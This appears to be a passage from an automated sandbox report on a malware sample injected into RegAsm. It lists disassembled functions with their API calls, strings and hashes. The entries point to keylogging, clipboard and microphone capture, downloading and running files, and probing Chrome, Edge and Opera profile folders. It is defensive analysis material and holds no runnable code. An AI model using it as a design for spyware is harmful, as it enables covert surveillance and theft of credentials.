Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: f7984e926e8c95a34454379bbfdabafc2b938cb6f1821079f173f9e9d42172cb
Instruction ID: 673b891c05171ccbd57fb692160b55fa7372551b064b24c29e954696105cbb10
Opcode Fuzzy Hash: f7984e926e8c95a34454379bbfdabafc2b938cb6f1821079f173f9e9d42172cb
Instruction Fuzzy Hash: 68119D315043006BC614FB26DC179AFB7A8AF90318F40053FF656665E2FF79AA18869B

Uniqueness

Uniqueness Score: -1.00%

Function 00443A11 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4348ab701141db2ee471a76f6354be3bba6a68761b83c07e18708a65b4a21837
Instruction ID: ee859d392e96439f373780085e5d4acac94642adf9cf6752a144726972cbb9ce
Opcode Fuzzy Hash: 4348ab701141db2ee471a76f6354be3bba6a68761b83c07e18708a65b4a21837
Instruction Fuzzy Hash: 8901D1B26096167EBA205EB97CC5D27A24DDF41BBA331033BF821B12E1DB28CD014169

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3D3 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C3EC
GetFileSize.KERNEL32(00000000,00000000), ref: 0041C400
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C425
CloseHandle.KERNEL32(00000000), ref: 0041C433

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 7d1abebc12fc94ec9a74679c21743bb31c0bab12d6289aad5436d2a906a43a00
Instruction ID: 9460c0e9f1be17d3a5c73fdfb64ffb2f3e7011bcb4b74989fe8713925d790063
Opcode Fuzzy Hash: 7d1abebc12fc94ec9a74679c21743bb31c0bab12d6289aad5436d2a906a43a00
Instruction Fuzzy Hash: 75F0F6B1245318BFE2101B25ECD8FBB365CEB867A9F00053EF801A22C1CA298C059176

Uniqueness

Uniqueness Score: -1.00%

Function 0041C12B Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C143
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C156
CloseHandle.KERNEL32(00000000), ref: 0041C181
CloseHandle.KERNEL32(00000000), ref: 0041C189

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcess
String ID:
API String ID: 39102293-0
Opcode ID: ad13b29b5186b8d2a777d246caf505faf64a93951fc8710eab1e0b4fee4cd567
Instruction ID: dfdfa86792278b502d1eb42efa140159a66a7ff1f98b550c11ab3cc3ce1a0da6
Opcode Fuzzy Hash: ad13b29b5186b8d2a777d246caf505faf64a93951fc8710eab1e0b4fee4cd567
Instruction Fuzzy Hash: 04012B312C0314BBD61057949C89FF7B26CDB48B56F000167F904D21A2EFA4CC818A69

Uniqueness

Uniqueness Score: -1.00%

Function 004397A3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004397BA

Part of subcall function 00439DF2: ___AdjustPointer.LIBCMT ref: 00439E3C

_UnwindNestedFrames.LIBCMT ref: 004397D1
___FrameUnwindToState.LIBVCRUNTIME ref: 004397E3
CallCatchBlock.LIBVCRUNTIME ref: 00439807

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: be155fe4af78ede5c1a3c25ed52085de123386828037b7556834d3f12658177e
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: E1010532000509BBCF12AF55CC41E9A3BAAEF4C714F14901AF91861121C3BAE861DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00419331 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0041933E
GetSystemMetrics.USER32 ref: 00419344
GetSystemMetrics.USER32 ref: 0041934A
GetSystemMetrics.USER32 ref: 00419350

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: a8a10265127c763042278c4190aab65d811543c76a51fb13ac7f57df5cb55ee0
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: 1CF0AFB1B0432A4BD700EE758C55A6F6BD9ABD9364F10083FF61987281EEACDC458B85

Uniqueness

Uniqueness Score: -1.00%

Function 00438E71 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438E71
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438E76
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438E7B

Part of subcall function 0043A37A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A38B

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438E90

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: f0afba6f7780d5bf74e6a5573e22c31841aeff3766371a409bd4a5a5d01ecf52
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 60C00244480345545C507AB256132AE83005AAE78CF8474CFBD90976038F4F042BA47F

Uniqueness

Uniqueness Score: -1.00%

Function 004507FA Relevance: 6.0, APIs: 4, Instructions: 13COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 004507FE

Part of subcall function 00450443: _free.LIBCMT ref: 00450460
Part of subcall function 00450443: _free.LIBCMT ref: 00450472
Part of subcall function 00450443: _free.LIBCMT ref: 00450484
Part of subcall function 00450443: _free.LIBCMT ref: 00450496
Part of subcall function 00450443: _free.LIBCMT ref: 004504A8
Part of subcall function 00450443: _free.LIBCMT ref: 004504BA
Part of subcall function 00450443: _free.LIBCMT ref: 004504CC
Part of subcall function 00450443: _free.LIBCMT ref: 004504DE
Part of subcall function 00450443: _free.LIBCMT ref: 004504F0
Part of subcall function 00450443: _free.LIBCMT ref: 00450502
Part of subcall function 00450443: _free.LIBCMT ref: 00450514
Part of subcall function 00450443: _free.LIBCMT ref: 00450526
Part of subcall function 00450443: _free.LIBCMT ref: 00450538

_free.LIBCMT ref: 00450804

Part of subcall function 00446642: HeapFree.KERNEL32(00000000,00000000), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 0045080D
_free.LIBCMT ref: 00450816

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 1cd87d9d34dfb911850270a495b6b246a543b9ad1aa93bbf5454c4fa681dad10
Instruction ID: 0a901d858d4f7a9cb6e28ebdce439497d4a869be8396c3bb63b9c8bb8f03c8e5
Opcode Fuzzy Hash: 1cd87d9d34dfb911850270a495b6b246a543b9ad1aa93bbf5454c4fa681dad10
Instruction Fuzzy Hash: 69D0E9A9D00204B6EB10F6F5889785D626C6A1A309B2258467A5556107D93C9614572E

Uniqueness

Uniqueness Score: -1.00%

Function 00442B9D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00442C2D

Strings

pow, xrefs: 00442C05, 00442C22

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 7999687525a5f056358f4945bcea889633b97b56b968074450efa294ab446d87
Instruction ID: 800cb06e21c1ea329817983786c60422269b4338f3bf5502af9070688d2886a7
Opcode Fuzzy Hash: 7999687525a5f056358f4945bcea889633b97b56b968074450efa294ab446d87
Instruction Fuzzy Hash: F8515761E0420286FB117B14CE4137F6B94DB40B52F604D6BF096863AAEA7CCCD59A4F

Uniqueness

Uniqueness Score: -1.00%

Function 0040B696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 004346BE: __onexit.LIBCMT ref: 004346C4

__Init_thread_footer.LIBCMT ref: 0040B6E5

Strings

[Text copied to clipboard], xrefs: 0040B734
[End of clipboard], xrefs: 0040B727

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 77bb7b1a882d07f38ad2e0e13fa4f6d1d7537907aa60ef86b3620ba4b816f84a
Instruction ID: 16c0118c4940dc8c8cdefc39caf5514adba26d66fbf19c316674452536a64041
Opcode Fuzzy Hash: 77bb7b1a882d07f38ad2e0e13fa4f6d1d7537907aa60ef86b3620ba4b816f84a
Instruction Fuzzy Hash: 4F215E31A001155ACB04FB66DC929EEB365EF94318F10443FE905771D2EF386D4A8A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00451A78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451CD3,?,00000050,?,?,?,?,?), ref: 00451B53

Strings

ACP, xrefs: 00451A96
OCP, xrefs: 00451ACC

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 36be01f97a537e8ba0716070fa63bca62691f225810e3a6ae3673f48be3d0d2c
Instruction ID: 2aace4edf02333579f01dd7c3f1da6a92a169870855e4ac957397fbfc8aeaab6
Opcode Fuzzy Hash: 36be01f97a537e8ba0716070fa63bca62691f225810e3a6ae3673f48be3d0d2c
Instruction Fuzzy Hash: 97214B66A01100A2D7319B54CD41F9B73AADF54B16F168427ED0AD7322F73AED48C358

Uniqueness

Uniqueness Score: -1.00%

Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415C17,?,00000001,0000004C,00000000), ref: 00405030

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415C17,?,00000001,0000004C,00000000), ref: 00405087

Strings

KeepAlive | Enabled | Timeout: , xrefs: 0040501F

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 481472006-1507639952
Opcode ID: 2ff53a8d23a981aa545793ac31cbd4e6d03cb5d17771411f6f8dce199051bbd5
Instruction ID: 408d130ebb64bbfd0941b37d565a602b4c828654bbe33badbbaee97ad12a9a8a
Opcode Fuzzy Hash: 2ff53a8d23a981aa545793ac31cbd4e6d03cb5d17771411f6f8dce199051bbd5
Instruction Fuzzy Hash: 7D2104719006405BD700B735980677F7BA4EB51308F84087EE8491B2E2EABD5A88CBEF

Uniqueness

Uniqueness Score: -1.00%

Function 00416589 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0041658E
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004165F0

Strings

!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: !D@
API String ID: 1931167962-604454484
Opcode ID: 5204d5ebba49abcec9b2b75e421dbb2f3c49301a5bbfff731c75bc7ca4e4003c
Instruction ID: 8eac3a0e3f46d7fc50306be76c602f9c05c650d7e8bc35a92d0807ed5fefabc8
Opcode Fuzzy Hash: 5204d5ebba49abcec9b2b75e421dbb2f3c49301a5bbfff731c75bc7ca4e4003c
Instruction Fuzzy Hash: E51151716083429AC714FF72D8969BE73A8AF50348F400C3FF546621E2EE3C9949C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0041B43D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B457

Strings

%02i:%02i:%02i:%03i , xrefs: 0041B46C
| , xrefs: 0041B48A

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i
API String ID: 481472006-2430845779
Opcode ID: 0965455ac3cc5cd251e471c145658d9518680e0d00218565a943323c8c49139a
Instruction ID: 03358708bbd9b017bd50802dda466b5f99439c3f85cc638ee3aa4cbb1873ed31
Opcode Fuzzy Hash: 0965455ac3cc5cd251e471c145658d9518680e0d00218565a943323c8c49139a
Instruction Fuzzy Hash: CD1181715082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA48C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC65 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0041AC8A

Strings

hYG, xrefs: 0041AC94
alarm.wav, xrefs: 0041AC75

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: alarm.wav$hYG
API String ID: 1174141254-2782910960
Opcode ID: 102b7049108937ecb2551a5b0831122996ae1d7ad2dfa7ff9718c1c128fa3328
Instruction ID: 6fbaea307e372094891d743aaee9c0f939e2fdd96fa8816cbaee0bb86098aa9c
Opcode Fuzzy Hash: 102b7049108937ecb2551a5b0831122996ae1d7ad2dfa7ff9718c1c128fa3328
Instruction Fuzzy Hash: 4601B5B064460167C604B73598166EE37564B80328F10407FF68A672E2FFBC9D99C6DF

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0040B0B2: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B0C0
Part of subcall function 0040B0B2: wsprintfW.USER32 ref: 0040B141

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

CloseHandle.KERNEL32(?), ref: 0040B002
UnhookWindowsHookEx.USER32 ref: 0040B015

Strings

Online Keylogger Stopped, xrefs: 0040AFAF, 0040AFB7, 0040AFDE

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped
API String ID: 1623830855-1496645233
Opcode ID: 2ae9807e6bd3884737ed814ff7f34596be53ae978bf2fd778cdb7f060477918f
Instruction ID: 1efb9077e68cf03edcab76f53168a10b3f917b6d2ceb1aad6be5b684b2c268e0
Opcode Fuzzy Hash: 2ae9807e6bd3884737ed814ff7f34596be53ae978bf2fd778cdb7f060477918f
Instruction Fuzzy Hash: A301B531A002109BD7257B75C80B7BE7BA59B41305F4004BFEA82226D2EBB91855D7DF

Uniqueness

Uniqueness Score: -1.00%

Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
waveInAddBuffer.WINMM(?,00000020), ref: 0040185F

Strings

XMG, xrefs: 004017F8

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$BufferHeaderPrepare
String ID: XMG
API String ID: 2315374483-813777761
Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004489A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,*JD,00000000,00000001,?,?,00444A2A,?,?,?,?,00000004), ref: 004489F2

Strings

*JD, xrefs: 004489E9, 004489D6
IsValidLocaleName, xrefs: 004489B7, 004489C1

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LocaleValid
String ID: *JD$IsValidLocaleName
API String ID: 1901932003-3028385341
Opcode ID: 885e5d5ef50d6046afa059cf3ad33c53d79120da0930dcc87483d6c2d39b7979
Instruction ID: 00ed84e355f5da9bae20177a078cc614c93cb7288f224e07fdc481b4eaf2d14a
Opcode Fuzzy Hash: 885e5d5ef50d6046afa059cf3ad33c53d79120da0930dcc87483d6c2d39b7979
Instruction Fuzzy Hash: C9F0BE30A80A08F7DB106B61DC06BAE7E64CB44B12F10416AFE056B292CEB95E45969E

Uniqueness

Uniqueness Score: -1.00%

Function 0040C474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C4A7

Strings

\AppData\Local\Microsoft\Edge\, xrefs: 0040C491
UserProfile, xrefs: 0040C47B

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Microsoft\Edge\
API String ID: 1174141254-2800177040
Opcode ID: 005113bceed41b46b08f1c5169385e114fe8d561df6c300188df0fab76f96e44
Instruction ID: b80ae851aa5927822d0c51d0b35e317520b22a8e9d88b83e7a71d4e2fe34f5f7
Opcode Fuzzy Hash: 005113bceed41b46b08f1c5169385e114fe8d561df6c300188df0fab76f96e44
Instruction Fuzzy Hash: 88F05E31A0021996C604BBF69C578FF7B2C9D10709B10017FB601B21D2EE7C994186EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C411 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C444

Strings

\AppData\Local\Google\Chrome\, xrefs: 0040C42E
UserProfile, xrefs: 0040C418

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: 2066b1da8f3cfaf4565779458d84ee94ea5e3292e0f50ee636531b6a613f111f
Instruction ID: 57f2599c21fdc32d718450e2580da6f8e29e9aa57867b8a4561a60834e957018
Opcode Fuzzy Hash: 2066b1da8f3cfaf4565779458d84ee94ea5e3292e0f50ee636531b6a613f111f
Instruction Fuzzy Hash: 90F05E30A0021996C604BBB69C578BF7B2C9D10709B40017FB601B21D2EE78994586EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000), ref: 0040C50A

Strings

AppData, xrefs: 0040C4DE
\Opera Software\Opera Stable\, xrefs: 0040C4F4

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: ff682cdd3e2b9923dc6186ada0b530c2cb62b9c23a32b71dac79375c1871f708
Instruction ID: 4f687090449c5efc0469f9fcadb94194348ed293e3e387ab461cbc240459fd33
Opcode Fuzzy Hash: ff682cdd3e2b9923dc6186ada0b530c2cb62b9c23a32b71dac79375c1871f708
Instruction Fuzzy Hash: 55F05E30A00219A6CA04B7F69C578EF7B6C9D10709B00017BB602B21D2EE789D4586EA

Uniqueness

Uniqueness Score: -1.00%

Function 00443744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044378D

Strings

X8_, xrefs: 00443744, 00443773

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: X8_
API String ID: 269201875-1906660996
Opcode ID: d460b1741f54e0029a4e5fbbbd0d5cba12ff9b22a0c271ac9f4150986e41f0d4
Instruction ID: 2eaf62927b916dbd512ee460b950b3c7f0c543798a2e1acfd6e2618ac7ae4685
Opcode Fuzzy Hash: d460b1741f54e0029a4e5fbbbd0d5cba12ff9b22a0c271ac9f4150986e41f0d4
Instruction Fuzzy Hash: 3EE0E5E2A0691001F6797A3F7E1275B06498B81B3AF22832FF538861C1CFAC4942505E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B594 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B599

Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A414
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A41F
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A426
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A430
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43D
Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A459

Part of subcall function 0040A584: SetEvent.KERNEL32(?,?,?,0040B77D,?,?,?,?,?,00000000), ref: 0040A5B0

Strings

[AltL], xrefs: 0040B5DB
[AltR], xrefs: 0040B5CF

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: 38b111ad328f1563c65d554228bd5194cfda03e72d1420571c47aa7433a1dd8a
Instruction ID: 5b499cff6aaae3c53dc3e1166fb83c1288de984d5ca86385b07af6415785c0e2
Opcode Fuzzy Hash: 38b111ad328f1563c65d554228bd5194cfda03e72d1420571c47aa7433a1dd8a
Instruction Fuzzy Hash: 7AE0652170021066C828323D6D1F66E2951DB41758B4001BFFC426B6CAEABD4E1546CF

Uniqueness

Uniqueness Score: -1.00%

Function 0044EBAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBD7
GetACP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBEE

Strings

5D, xrefs: 0044EBC5

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 5D
API String ID: 0-3475471828
Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction ID: dd86e4deb3fd1fb56fb386e402429c764a368b420efd63c67ba3ad0e757172fe
Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction Fuzzy Hash: 8DF0C831400104CBEB20DB59DC8C76A7771FB00335F144755E52A866E2C7B99C81CF8D

Uniqueness

Uniqueness Score: -1.00%

Function 004160D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004160F6

Strings

!D@, xrefs: 00416FD7
open, xrefs: 004160F0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: 453d0a70b3f563ea5a3135f3bc09350ed02b1cc902b7fa42382088d4a523be4d
Instruction ID: 272896446fdd02a3c20b9e2560cdc717c469be1552f5b7850574438bcff29664
Opcode Fuzzy Hash: 453d0a70b3f563ea5a3135f3bc09350ed02b1cc902b7fa42382088d4a523be4d
Instruction Fuzzy Hash: 98E012712483059AD614EA72DC91EFEB35CAB50755F400C3FF906954E2EF3C5C49C659

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

